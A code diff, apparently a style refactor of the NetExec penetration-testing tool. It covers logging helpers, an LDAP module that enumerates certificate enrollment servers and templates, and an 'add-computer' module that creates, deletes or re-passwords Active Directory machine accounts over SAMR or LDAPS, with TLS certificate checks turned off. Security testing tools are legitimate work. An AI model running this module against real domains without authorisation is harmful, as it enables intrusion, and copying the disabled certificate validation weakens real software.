open(output_file, "x")
|
open(output_file, "x") # noqa: SIM115
|
||||||
file_creation = True
|
file_creation = True
|
||||||
|
|
||||||
file_handler = RotatingFileHandler(output_file, maxBytes=100000)
|
file_handler = RotatingFileHandler(output_file, maxBytes=100000)
|
||||||
|
|
||||||
with file_handler._open() as f:
|
with file_handler._open() as f:
|
||||||
if file_creation:
|
if file_creation:
|
||||||
f.write("[%s]> %s\n\n" % (datetime.now().strftime("%d-%m-%Y %H:%M:%S"), " ".join(sys.argv)))
|
f.write(f"[{datetime.now().strftime('%d-%m-%Y %H:%M:%S')}]> {' '.join(sys.argv)}\n\n")
|
||||||
else:
|
else:
|
||||||
f.write("\n[%s]> %s\n\n" % (datetime.now().strftime("%d-%m-%Y %H:%M:%S"), " ".join(sys.argv)))
|
f.write(f"\n[{datetime.now().strftime('%d-%m-%Y %H:%M:%S')}]> {' '.join(sys.argv)}\n\n")
|
||||||
|
|
||||||
file_handler.setFormatter(file_formatter)
|
file_handler.setFormatter(file_formatter)
|
||||||
self.logger.addHandler(file_handler)
|
self.logger.addHandler(file_handler)
|
||||||
|
@ -181,16 +143,15 @@ class NXCAdapter(logging.LoggerAdapter):
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def init_log_file():
|
def init_log_file():
|
||||||
newpath = os.path.expanduser("~/.nxc") + "/logs/" + datetime.now().strftime('%Y-%m-%d')
|
newpath = os.path.expanduser("~/.nxc") + "/logs/" + datetime.now().strftime("%Y-%m-%d")
|
||||||
if not os.path.exists(newpath):
|
if not os.path.exists(newpath):
|
||||||
os.makedirs(newpath)
|
os.makedirs(newpath)
|
||||||
log_filename = os.path.join(
|
return os.path.join(
|
||||||
os.path.expanduser("~/.nxc"),
|
os.path.expanduser("~/.nxc"),
|
||||||
"logs",
|
"logs",
|
||||||
datetime.now().strftime('%Y-%m-%d'),
|
datetime.now().strftime("%Y-%m-%d"),
|
||||||
f"log_{datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.log",
|
f"log_{datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.log",
|
||||||
)
|
)
|
||||||
return log_filename
|
|
||||||
|
|
||||||
|
|
||||||
class TermEscapeCodeFormatter(logging.Formatter):
|
class TermEscapeCodeFormatter(logging.Formatter):
|
||||||
|
@ -199,7 +160,7 @@ class TermEscapeCodeFormatter(logging.Formatter):
|
||||||
def __init__(self, fmt=None, datefmt=None, style="%", validate=True):
|
def __init__(self, fmt=None, datefmt=None, style="%", validate=True):
|
||||||
super().__init__(fmt, datefmt, style, validate)
|
super().__init__(fmt, datefmt, style, validate)
|
||||||
|
|
||||||
def format(self, record):
|
def format(self, record): # noqa: A003
|
||||||
escape_re = re.compile(r"\x1b\[[0-9;]*m")
|
escape_re = re.compile(r"\x1b\[[0-9;]*m")
|
||||||
record.msg = re.sub(escape_re, "", str(record.msg))
|
record.msg = re.sub(escape_re, "", str(record.msg))
|
||||||
return super().format(record)
|
return super().format(record)
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
"""
|
"""
|
|
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
import re
|
import re
|
||||||
from impacket.ldap import ldap, ldapasn1
|
from impacket.ldap import ldap, ldapasn1
|
||||||
from impacket.ldap.ldap import LDAPSearchError
|
from impacket.ldap.ldap import LDAPSearchError
|
||||||
|
@ -40,23 +38,21 @@ class NXCModule:
|
||||||
self.base_dn = module_options["BASE_DN"]
|
self.base_dn = module_options["BASE_DN"]
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
"""
|
"""On a successful LDAP login we perform a search for all PKI Enrollment Server or Certificate Templates Names."""
|
||||||
On a successful LDAP login we perform a search for all PKI Enrollment Server or Certificate Templates Names.
|
|
||||||
"""
|
|
||||||
if self.server is None:
|
if self.server is None:
|
||||||
search_filter = "(objectClass=pKIEnrollmentService)"
|
search_filter = "(objectClass=pKIEnrollmentService)"
|
||||||
else:
|
else:
|
||||||
search_filter = f"(distinguishedName=CN={self.server},CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,"
|
search_filter = f"(distinguishedName=CN={self.server},CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,"
|
||||||
self.context.log.highlight("Using PKI CN: {}".format(self.server))
|
self.context.log.highlight(f"Using PKI CN: {self.server}")
|
||||||
|
|
||||||
context.log.display("Starting LDAP search with search filter '{}'".format(search_filter))
|
context.log.display(f"Starting LDAP search with search filter '{search_filter}'")
|
||||||
|
|
||||||
try:
|
try:
|
||||||
sc = ldap.SimplePagedResultsControl()
|
sc = ldap.SimplePagedResultsControl()
|
||||||
base_dn_root = connection.ldapConnection._baseDN if self.base_dn is None else self.base_dn
|
base_dn_root = connection.ldapConnection._baseDN if self.base_dn is None else self.base_dn
|
||||||
|
|
||||||
if self.server is None:
|
if self.server is None:
|
||||||
resp = connection.ldapConnection.search(
|
connection.ldapConnection.search(
|
||||||
searchFilter=search_filter,
|
searchFilter=search_filter,
|
||||||
attributes=[],
|
attributes=[],
|
||||||
sizeLimit=0,
|
sizeLimit=0,
|
||||||
|
@ -65,7 +61,7 @@ class NXCModule:
|
||||||
searchBase="CN=Configuration," + base_dn_root,
|
searchBase="CN=Configuration," + base_dn_root,
|
||||||
)
|
)
|
||||||
else:
|
else:
|
||||||
resp = connection.ldapConnection.search(
|
connection.ldapConnection.search(
|
||||||
searchFilter=search_filter + base_dn_root + ")",
|
searchFilter=search_filter + base_dn_root + ")",
|
||||||
attributes=["certificateTemplates"],
|
attributes=["certificateTemplates"],
|
||||||
sizeLimit=0,
|
sizeLimit=0,
|
||||||
|
@ -74,12 +70,10 @@ class NXCModule:
|
||||||
searchBase="CN=Configuration," + base_dn_root,
|
searchBase="CN=Configuration," + base_dn_root,
|
||||||
)
|
)
|
||||||
except LDAPSearchError as e:
|
except LDAPSearchError as e:
|
||||||
context.log.fail("Obtained unexpected exception: {}".format(str(e)))
|
context.log.fail(f"Obtained unexpected exception: {e}")
|
||||||
|
|
||||||
def process_servers(self, item):
|
def process_servers(self, item):
|
||||||
"""
|
"""Function that is called to process the items obtain by the LDAP search when listing PKI Enrollment Servers."""
|
||||||
Function that is called to process the items obtain by the LDAP search when listing PKI Enrollment Servers.
|
|
||||||
"""
|
|
||||||
if not isinstance(item, ldapasn1.SearchResultEntry):
|
if not isinstance(item, ldapasn1.SearchResultEntry):
|
||||||
return
|
return
|
||||||
|
|
||||||
|
@ -103,19 +97,17 @@ class NXCModule:
|
||||||
urls.append(match.group(1))
|
urls.append(match.group(1))
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
entry = host_name or "item"
|
entry = host_name or "item"
|
||||||
self.context.log.fail("Skipping {}, cannot process LDAP entry due to error: '{}'".format(entry, str(e)))
|
self.context.log.fail(f"Skipping {entry}, cannot process LDAP entry due to error: '{e!s}'")
|
||||||
|
|
||||||
if host_name:
|
if host_name:
|
||||||
self.context.log.highlight("Found PKI Enrollment Server: {}".format(host_name))
|
self.context.log.highlight(f"Found PKI Enrollment Server: {host_name}")
|
||||||
if cn:
|
if cn:
|
||||||
self.context.log.highlight("Found CN: {}".format(cn))
|
self.context.log.highlight(f"Found CN: {cn}")
|
||||||
for url in urls:
|
for url in urls:
|
||||||
self.context.log.highlight("Found PKI Enrollment WebService: {}".format(url))
|
self.context.log.highlight(f"Found PKI Enrollment WebService: {url}")
|
||||||
|
|
||||||
def process_templates(self, item):
|
def process_templates(self, item):
|
||||||
"""
|
"""Function that is called to process the items obtain by the LDAP search when listing Certificate Templates Names for a specific PKI Enrollment Server."""
|
||||||
Function that is called to process the items obtain by the LDAP search when listing Certificate Templates Names for a specific PKI Enrollment Server.
|
|
||||||
"""
|
|
||||||
if not isinstance(item, ldapasn1.SearchResultEntry):
|
if not isinstance(item, ldapasn1.SearchResultEntry):
|
||||||
return
|
return
|
||||||
|
|
||||||
|
@ -134,4 +126,4 @@ class NXCModule:
|
||||||
|
|
||||||
if templates:
|
if templates:
|
||||||
for t in templates:
|
for t in templates:
|
||||||
self.context.log.highlight("Found Certificate Template: {}".format(t))
|
self.context.log.highlight(f"Found Certificate Template: {t}")
|
||||||
|
|
|
@ -0,0 +1,305 @@
|
||||||
|
import ssl
|
||||||
|
import ldap3
|
||||||
|
from impacket.dcerpc.v5 import samr, epm, transport
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
|
class NXCModule:
|
||||||
|
"""
|
||||||
|
Module by CyberCelt: @Cyb3rC3lt
|
||||||
|
Initial module:
|
||||||
|
https://github.com/Cyb3rC3lt/CrackMapExec-Modules
|
||||||
|
Thanks to the guys at impacket for the original code
|
||||||
|
"""
|
||||||
|
|
||||||
|
name = "add-computer"
|
||||||
|
description = "Adds or deletes a domain computer"
|
||||||
|
supported_protocols = ["smb"]
|
||||||
|
opsec_safe = True
|
||||||
|
multiple_hosts = False
|
||||||
|
|
||||||
|
def options(self, context, module_options):
|
||||||
|
"""
|
||||||
|
add-computer: Specify add-computer to call the module using smb
|
||||||
|
NAME: Specify the NAME option to name the Computer to be added
|
||||||
|
PASSWORD: Specify the PASSWORD option to supply a password for the Computer to be added
|
||||||
|
DELETE: Specify DELETE to remove a Computer
|
||||||
|
CHANGEPW: Specify CHANGEPW to modify a Computer password
|
||||||
|
Usage: nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password1"
|
||||||
|
nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" DELETE=True
|
||||||
|
nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password2" CHANGEPW=True
|
||||||
|
"""
|
||||||
|
self.__baseDN = None
|
||||||
|
self.__computerGroup = None
|
||||||
|
self.__method = "SAMR"
|
||||||
|
self.__noAdd = False
|
||||||
|
self.__delete = False
|
||||||
|
self.noLDAPRequired = False
|
||||||
|
|
||||||
|
if "DELETE" in module_options:
|
||||||
|
self.__delete = True
|
||||||
|
|
||||||
|
if "CHANGEPW" in module_options and ("NAME" not in module_options or "PASSWORD" not in module_options):
|
||||||
|
context.log.error("NAME and PASSWORD options are required!")
|
||||||
|
elif "CHANGEPW" in module_options:
|
||||||
|
self.__noAdd = True
|
||||||
|
|
||||||
|
if "NAME" in module_options:
|
||||||
|
self.__computerName = module_options["NAME"]
|
||||||
|
if self.__computerName[-1] != "$":
|
||||||
|
self.__computerName += "$"
|
||||||
|
else:
|
||||||
|
context.log.error("NAME option is required!")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
if "PASSWORD" in module_options:
|
||||||
|
self.__computerPassword = module_options["PASSWORD"]
|
||||||
|
elif "PASSWORD" not in module_options and not self.__delete:
|
||||||
|
context.log.error("PASSWORD option is required!")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
def on_login(self, context, connection):
|
||||||
|
self.__domain = connection.domain
|
||||||
|
self.__domainNetbios = connection.domain
|
||||||
|
self.__kdcHost = connection.hostname + "." + connection.domain
|
||||||
|
self.__target = self.__kdcHost
|
||||||
|
self.__username = connection.username
|
||||||
|
self.__password = connection.password
|
||||||
|
self.__targetIp = connection.host
|
||||||
|
self.__port = context.smb_server_port
|
||||||
|
self.__aesKey = context.aesKey
|
||||||
|
self.__hashes = context.hash
|
||||||
|
self.__doKerberos = connection.kerberos
|
||||||
|
self.__nthash = ""
|
||||||
|
self.__lmhash = ""
|
||||||
|
|
||||||
|
if context.hash and ":" in context.hash[0]:
|
||||||
|
hashList = context.hash[0].split(":")
|
||||||
|
self.__nthash = hashList[-1]
|
||||||
|
self.__lmhash = hashList[0]
|
||||||
|
elif context.hash and ":" not in context.hash[0]:
|
||||||
|
self.__nthash = context.hash[0]
|
||||||
|
self.__lmhash = "00000000000000000000000000000000"
|
||||||
|
|
||||||
|
# First try to add via SAMR over SMB
|
||||||
|
self.do_samr_add(context)
|
||||||
|
|
||||||
|
# If SAMR fails now try over LDAPS
|
||||||
|
if not self.noLDAPRequired:
|
||||||
|
self.do_ldaps_add(connection, context)
|
||||||
|
else:
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
def do_samr_add(self, context):
|
||||||
|
"""
|
||||||
|
Connects to a target server and performs various operations related to adding or deleting machine accounts.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
context (object): The context object.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
None
|
||||||
|
"""
|
||||||
|
target = self.__targetIp or self.__target
|
||||||
|
string_binding = epm.hept_map(target, samr.MSRPC_UUID_SAMR, protocol="ncacn_np")
|
||||||
|
|
||||||
|
rpc_transport = transport.DCERPCTransportFactory(string_binding)
|
||||||
|
rpc_transport.set_dport(self.__port)
|
||||||
|
|
||||||
|
if self.__targetIp is not None:
|
||||||
|
rpc_transport.setRemoteHost(self.__targetIp)
|
||||||
|
rpc_transport.setRemoteName(self.__target)
|
||||||
|
|
||||||
|
if hasattr(rpc_transport, "set_credentials"):
|
||||||
|
# This method exists only for selected protocol sequences.
|
||||||
|
rpc_transport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
|
||||||
|
|
||||||
|
rpc_transport.set_kerberos(self.__doKerberos, self.__kdcHost)
|
||||||
|
|
||||||
|
dce = rpc_transport.get_dce_rpc()
|
||||||
|
dce.connect()
|
||||||
|
dce.bind(samr.MSRPC_UUID_SAMR)
|
||||||
|
|
||||||
|
samr_connect_response = samr.hSamrConnect5(dce, f"\\\\{self.__target}\x00", samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN)
|
||||||
|
serv_handle = samr_connect_response["ServerHandle"]
|
||||||
|
|
||||||
|
samr_enum_response = samr.hSamrEnumerateDomainsInSamServer(dce, serv_handle)
|
||||||
|
domains = samr_enum_response["Buffer"]["Buffer"]
|
||||||
|
domains_without_builtin = [domain for domain in domains if domain["Name"].lower() != "builtin"]
|
||||||
|
if len(domains_without_builtin) > 1:
|
||||||
|
domain = list(filter(lambda x: x["Name"].lower() == self.__domainNetbios, domains))
|
||||||
|
if len(domain) != 1:
|
||||||
|
context.log.highlight("{}".format('This domain does not exist: "' + self.__domainNetbios + '"'))
|
||||||
|
context.log.highlight("Available domain(s):")
|
||||||
|
for domain in domains:
|
||||||
|
context.log.highlight(f" * {domain['Name']}")
|
||||||
|
raise Exception
|
||||||
|
else:
|
||||||
|
selected_domain = domain[0]["Name"]
|
||||||
|
else:
|
||||||
|
selected_domain = domains_without_builtin[0]["Name"]
|
||||||
|
|
||||||
|
samr_lookup_domain_response = samr.hSamrLookupDomainInSamServer(dce, serv_handle, selected_domain)
|
||||||
|
domain_sid = samr_lookup_domain_response["DomainId"]
|
||||||
|
|
||||||
|
context.log.debug(f"Opening domain {selected_domain}...")
|
||||||
|
samr_open_domain_response = samr.hSamrOpenDomain(dce, serv_handle, samr.DOMAIN_LOOKUP | samr.DOMAIN_CREATE_USER, domain_sid)
|
||||||
|
domain_handle = samr_open_domain_response["DomainHandle"]
|
||||||
|
|
||||||
|
if self.__noAdd or self.__delete:
|
||||||
|
try:
|
||||||
|
check_for_user = samr.hSamrLookupNamesInDomain(dce, domain_handle, [self.__computerName])
|
||||||
|
except samr.DCERPCSessionError as e:
|
||||||
|
if e.error_code == 0xC0000073:
|
||||||
|
context.log.highlight(f"{self.__computerName} not found in domain {selected_domain}")
|
||||||
|
self.noLDAPRequired = True
|
||||||
|
context.log.exception(e)
|
||||||
|
|
||||||
|
user_rid = check_for_user["RelativeIds"]["Element"][0]
|
||||||
|
if self.__delete:
|
||||||
|
access = samr.DELETE
|
||||||
|
message = "delete"
|
||||||
|
else:
|
||||||
|
access = samr.USER_FORCE_PASSWORD_CHANGE
|
||||||
|
message = "set the password for"
|
||||||
|
try:
|
||||||
|
open_user = samr.hSamrOpenUser(dce, domain_handle, access, user_rid)
|
||||||
|
user_handle = open_user["UserHandle"]
|
||||||
|
except samr.DCERPCSessionError as e:
|
||||||
|
if e.error_code == 0xC0000022:
|
||||||
|
context.log.highlight(f"{self.__username + ' does not have the right to ' + message + ' ' + self.__computerName}")
|
||||||
|
self.noLDAPRequired = True
|
||||||
|
context.log.exception(e)
|
||||||
|
else:
|
||||||
|
if self.__computerName is not None:
|
||||||
|
try:
|
||||||
|
samr.hSamrLookupNamesInDomain(dce, domain_handle, [self.__computerName])
|
||||||
|
self.noLDAPRequired = True
|
||||||
|
context.log.highlight("{}".format('Computer account already exists with the name: "' + self.__computerName + '"'))
|
||||||
|
sys.exit(1)
|
||||||
|
except samr.DCERPCSessionError as e:
|
||||||
|
if e.error_code != 0xC0000073:
|
||||||
|
raise
|
||||||
|
else:
|
||||||
|
found_unused = False
|
||||||
|
while not found_unused:
|
||||||
|
self.__computerName = self.generateComputerName()
|
||||||
|
try:
|
||||||
|
samr.hSamrLookupNamesInDomain(dce, domain_handle, [self.__computerName])
|
||||||
|
except samr.DCERPCSessionError as e:
|
||||||
|
if e.error_code == 0xC0000073:
|
||||||
|
found_unused = True
|
||||||
|
else:
|
||||||
|
raise
|
||||||
|
try:
|
||||||
|
create_user = samr.hSamrCreateUser2InDomain(
|
||||||
|
dce,
|
||||||
|
domain_handle,
|
||||||
|
self.__computerName,
|
||||||
|
samr.USER_WORKSTATION_TRUST_ACCOUNT,
|
||||||
|
samr.USER_FORCE_PASSWORD_CHANGE,
|
||||||
|
)
|
||||||
|
self.noLDAPRequired = True
|
||||||
|
context.log.highlight('Successfully added the machine account: "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"')
|
||||||
|
except samr.DCERPCSessionError as e:
|
||||||
|
if e.error_code == 0xC0000022:
|
||||||
|
context.log.highlight("{}".format('The following user does not have the right to create a computer account: "' + self.__username + '"'))
|
||||||
|
elif e.error_code == 0xC00002E7:
|
||||||
|
context.log.highlight("{}".format('The following user exceeded their machine account quota: "' + self.__username + '"'))
|
||||||
|
context.log.exception(e)
|
||||||
|
user_handle = create_user["UserHandle"]
|
||||||
|
|
||||||
|
if self.__delete:
|
||||||
|
samr.hSamrDeleteUser(dce, user_handle)
|
||||||
|
context.log.highlight("{}".format('Successfully deleted the "' + self.__computerName + '" Computer account'))
|
||||||
|
self.noLDAPRequired = True
|
||||||
|
user_handle = None
|
||||||
|
else:
|
||||||
|
samr.hSamrSetPasswordInternal4New(dce, user_handle, self.__computerPassword)
|
||||||
|
if self.__noAdd:
|
||||||
|
context.log.highlight("{}".format('Successfully set the password of machine "' + self.__computerName + '" with password "' + self.__computerPassword + '"'))
|
||||||
|
self.noLDAPRequired = True
|
||||||
|
else:
|
||||||
|
check_for_user = samr.hSamrLookupNamesInDomain(dce, domain_handle, [self.__computerName])
|
||||||
|
user_rid = check_for_user["RelativeIds"]["Element"][0]
|
||||||
|
open_user = samr.hSamrOpenUser(dce, domain_handle, samr.MAXIMUM_ALLOWED, user_rid)
|
||||||
|
user_handle = open_user["UserHandle"]
|
||||||
|
req = samr.SAMPR_USER_INFO_BUFFER()
|
||||||
|
req["tag"] = samr.USER_INFORMATION_CLASS.UserControlInformation
|
||||||
|
req["Control"]["UserAccountControl"] = samr.USER_WORKSTATION_TRUST_ACCOUNT
|
||||||
|
samr.hSamrSetInformationUser2(dce, user_handle, req)
|
||||||
|
if not self.noLDAPRequired:
|
||||||
|
context.log.highlight("{}".format('Successfully added the machine account "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"'))
|
||||||
|
self.noLDAPRequired = True
|
||||||
|
|
||||||
|
if user_handle is not None:
|
||||||
|
samr.hSamrCloseHandle(dce, user_handle)
|
||||||
|
if domain_handle is not None:
|
||||||
|
samr.hSamrCloseHandle(dce, domain_handle)
|
||||||
|
if serv_handle is not None:
|
||||||
|
samr.hSamrCloseHandle(dce, serv_handle)
|
||||||
|
dce.disconnect()
|
||||||
|
|
||||||
|
def do_ldaps_add(self, connection, context):
|
||||||
|
"""
|
||||||
|
Performs an LDAPS add operation.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
connection (Connection): The LDAP connection object.
|
||||||
|
context (Context): The context object.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
None
|
||||||
|
|
||||||
|
Raises:
|
||||||
|
------
|
||||||
|
None
|
||||||
|
"""
|
||||||
|
ldap_domain = connection.domain.replace(".", ",dc=")
|
||||||
|
spns = [
|
||||||
|
f"HOST/{self.__computerName}",
|
||||||
|
f"HOST/{self.__computerName}.{connection.domain}",
|
||||||
|
f"RestrictedKrbHost/{self.__computerName}",
|
||||||
|
f"RestrictedKrbHost/{self.__computerName}.{connection.domain}",
|
||||||
|
]
|
||||||
|
ucd = {
|
||||||
|
"dnsHostName": f"{self.__computerName}.{connection.domain}",
|
||||||
|
"userAccountControl": 0x1000,
|
||||||
|
"servicePrincipalName": spns,
|
||||||
|
"sAMAccountName": self.__computerName,
|
||||||
|
"unicodePwd": f"{self.__computerPassword}".encode("utf-16-le")
|
||||||
|
}
|
||||||
|
tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2, ciphers="ALL:@SECLEVEL=0")
|
||||||
|
ldap_server = ldap3.Server(connection.host, use_ssl=True, port=636, get_info=ldap3.ALL, tls=tls)
|
||||||
|
c = ldap3.Connection(ldap_server, f"{connection.username}@{connection.domain}", connection.password)
|
||||||
|
c.bind()
|
||||||
|
|
||||||
|
if self.__delete:
|
||||||
|
result = c.delete(f"cn={self.__computerName},cn=Computers,dc={ldap_domain}")
|
||||||
|
if result:
|
||||||
|
context.log.highlight(f'Successfully deleted the "{self.__computerName}" Computer account')
|
||||||
|
elif result is False and c.last_error == "noSuchObject":
|
||||||
|
context.log.highlight(f'Computer named "{self.__computerName}" was not found')
|
||||||
|
elif result is False and c.last_error == "insufficientAccessRights":
|
||||||
|
context.log.highlight(f'Insufficient Access Rights to delete the Computer "{self.__computerName}"')
|
||||||
|
else:
|
||||||
|
context.log.highlight(f'Unable to delete the "{self.__computerName}" Computer account. The error was: {c.last_error}')
|
||||||
|
else:
|
||||||
|
result = c.add(
|
||||||
|
f"cn={self.__computerName},cn=Computers,dc={ldap_domain}",
|
||||||
|
["top", "person", "organizationalPerson", "user", "computer"],
|
||||||
|
ucd
|
||||||
|
)
|
||||||
|
if result:
|
||||||
|
context.log.highlight(f'Successfully added the machine account: "{self.__computerName}" with Password: "{self.__computerPassword}"')
|
||||||
|
context.log.highlight("You can try to verify this with the nxc command:")
|
||||||
|
context.log.highlight(f"nxc ldap {connection.host} -u {connection.username} -p {connection.password} -M group-mem -o GROUP='Domain Computers'")
|
||||||
|
elif result is False and c.last_error == "entryAlreadyExists":
|
||||||
|
context.log.highlight(f"The Computer account '{self.__computerName}' already exists")
|
||||||
|
elif not result:
|
||||||
|
context.log.highlight(f"Unable to add the '{self.__computerName}' Computer account. The error was: {c.last_error}")
|
||||||
|
c.unbind()
|
|
@ -1,307 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import ldap3
|
|
||||||
from impacket.dcerpc.v5 import samr, epm, transport
|
|
||||||
|
|
||||||
class NXCModule:
|
|
||||||
'''
|
|
||||||
Module by CyberCelt: @Cyb3rC3lt
|
|
||||||
Initial module:
|
|
||||||
https://github.com/Cyb3rC3lt/CrackMapExec-Modules
|
|
||||||
Thanks to the guys at impacket for the original code
|
|
||||||
'''
|
|
||||||
|
|
||||||
name = 'add-computer'
|
|
||||||
description = 'Adds or deletes a domain computer'
|
|
||||||
supported_protocols = ['smb']
|
|
||||||
opsec_safe = True
|
|
||||||
multiple_hosts = False
|
|
||||||
|
|
||||||
def options(self, context, module_options):
|
|
||||||
'''
|
|
||||||
add-computer: Specify add-computer to call the module using smb
|
|
||||||
NAME: Specify the NAME option to name the Computer to be added
|
|
||||||
PASSWORD: Specify the PASSWORD option to supply a password for the Computer to be added
|
|
||||||
DELETE: Specify DELETE to remove a Computer
|
|
||||||
CHANGEPW: Specify CHANGEPW to modify a Computer password
|
|
||||||
Usage: nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password1"
|
|
||||||
nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" DELETE=True
|
|
||||||
nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password2" CHANGEPW=True
|
|
||||||
'''
|
|
||||||
|
|
||||||
self.__baseDN = None
|
|
||||||
self.__computerGroup = None
|
|
||||||
self.__method = "SAMR"
|
|
||||||
self.__noAdd = False
|
|
||||||
self.__delete = False
|
|
||||||
self.noLDAPRequired = False
|
|
||||||
|
|
||||||
if 'DELETE' in module_options:
|
|
||||||
self.__delete = True
|
|
||||||
|
|
||||||
if 'CHANGEPW' in module_options and ('NAME' not in module_options or 'PASSWORD' not in module_options):
|
|
||||||
context.log.error('NAME and PASSWORD options are required!')
|
|
||||||
elif 'CHANGEPW' in module_options:
|
|
||||||
self.__noAdd = True
|
|
||||||
|
|
||||||
if 'NAME' in module_options:
|
|
||||||
self.__computerName = module_options['NAME']
|
|
||||||
if self.__computerName[-1] != '$':
|
|
||||||
self.__computerName += '$'
|
|
||||||
else:
|
|
||||||
context.log.error('NAME option is required!')
|
|
||||||
exit(1)
|
|
||||||
|
|
||||||
if 'PASSWORD' in module_options:
|
|
||||||
self.__computerPassword = module_options['PASSWORD']
|
|
||||||
elif 'PASSWORD' not in module_options and not self.__delete:
|
|
||||||
context.log.error('PASSWORD option is required!')
|
|
||||||
exit(1)
|
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
|
||||||
|
|
||||||
#Set some variables
|
|
||||||
self.__domain = connection.domain
|
|
||||||
self.__domainNetbios = connection.domain
|
|
||||||
self.__kdcHost = connection.hostname + "." + connection.domain
|
|
||||||
self.__target = self.__kdcHost
|
|
||||||
self.__username = connection.username
|
|
||||||
self.__password = connection.password
|
|
||||||
self.__targetIp = connection.host
|
|
||||||
self.__port = context.smb_server_port
|
|
||||||
self.__aesKey = context.aesKey
|
|
||||||
self.__hashes = context.hash
|
|
||||||
self.__doKerberos = connection.kerberos
|
|
||||||
self.__nthash = ""
|
|
||||||
self.__lmhash = ""
|
|
||||||
|
|
||||||
if context.hash and ":" in context.hash[0]:
|
|
||||||
hashList = context.hash[0].split(":")
|
|
||||||
self.__nthash = hashList[-1]
|
|
||||||
self.__lmhash = hashList[0]
|
|
||||||
elif context.hash and ":" not in context.hash[0]:
|
|
||||||
self.__nthash = context.hash[0]
|
|
||||||
self.__lmhash = "00000000000000000000000000000000"
|
|
||||||
|
|
||||||
# First try to add via SAMR over SMB
|
|
||||||
self.doSAMRAdd(context)
|
|
||||||
|
|
||||||
# If SAMR fails now try over LDAPS
|
|
||||||
if not self.noLDAPRequired:
|
|
||||||
self.doLDAPSAdd(connection,context)
|
|
||||||
else:
|
|
||||||
exit(1)
|
|
||||||
|
|
||||||
def doSAMRAdd(self,context):
|
|
||||||
|
|
||||||
if self.__targetIp is not None:
|
|
||||||
stringBinding = epm.hept_map(self.__targetIp, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np')
|
|
||||||
else:
|
|
||||||
stringBinding = epm.hept_map(self.__target, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np')
|
|
||||||
rpctransport = transport.DCERPCTransportFactory(stringBinding)
|
|
||||||
rpctransport.set_dport(self.__port)
|
|
||||||
|
|
||||||
if self.__targetIp is not None:
|
|
||||||
rpctransport.setRemoteHost(self.__targetIp)
|
|
||||||
rpctransport.setRemoteName(self.__target)
|
|
||||||
|
|
||||||
if hasattr(rpctransport, 'set_credentials'):
|
|
||||||
# This method exists only for selected protocol sequences.
|
|
||||||
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
|
|
||||||
self.__nthash, self.__aesKey)
|
|
||||||
|
|
||||||
rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
|
|
||||||
|
|
||||||
dce = rpctransport.get_dce_rpc()
|
|
||||||
servHandle = None
|
|
||||||
domainHandle = None
|
|
||||||
userHandle = None
|
|
||||||
try:
|
|
||||||
dce.connect()
|
|
||||||
dce.bind(samr.MSRPC_UUID_SAMR)
|
|
||||||
|
|
||||||
samrConnectResponse = samr.hSamrConnect5(dce, '\\\\%s\x00' % self.__target,
|
|
||||||
samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN )
|
|
||||||
servHandle = samrConnectResponse['ServerHandle']
|
|
||||||
|
|
||||||
samrEnumResponse = samr.hSamrEnumerateDomainsInSamServer(dce, servHandle)
|
|
||||||
domains = samrEnumResponse['Buffer']['Buffer']
|
|
||||||
domainsWithoutBuiltin = list(filter(lambda x : x['Name'].lower() != 'builtin', domains))
|
|
||||||
|
|
||||||
if len(domainsWithoutBuiltin) > 1:
|
|
||||||
domain = list(filter(lambda x : x['Name'].lower() == self.__domainNetbios, domains))
|
|
||||||
if len(domain) != 1:
|
|
||||||
context.log.highlight(u'{}'.format(
|
|
||||||
'This domain does not exist: "' + self.__domainNetbios + '"'))
|
|
||||||
logging.critical("Available domain(s):")
|
|
||||||
for domain in domains:
|
|
||||||
logging.error(" * %s" % domain['Name'])
|
|
||||||
raise Exception()
|
|
||||||
else:
|
|
||||||
selectedDomain = domain[0]['Name']
|
|
||||||
else:
|
|
||||||
selectedDomain = domainsWithoutBuiltin[0]['Name']
|
|
||||||
|
|
||||||
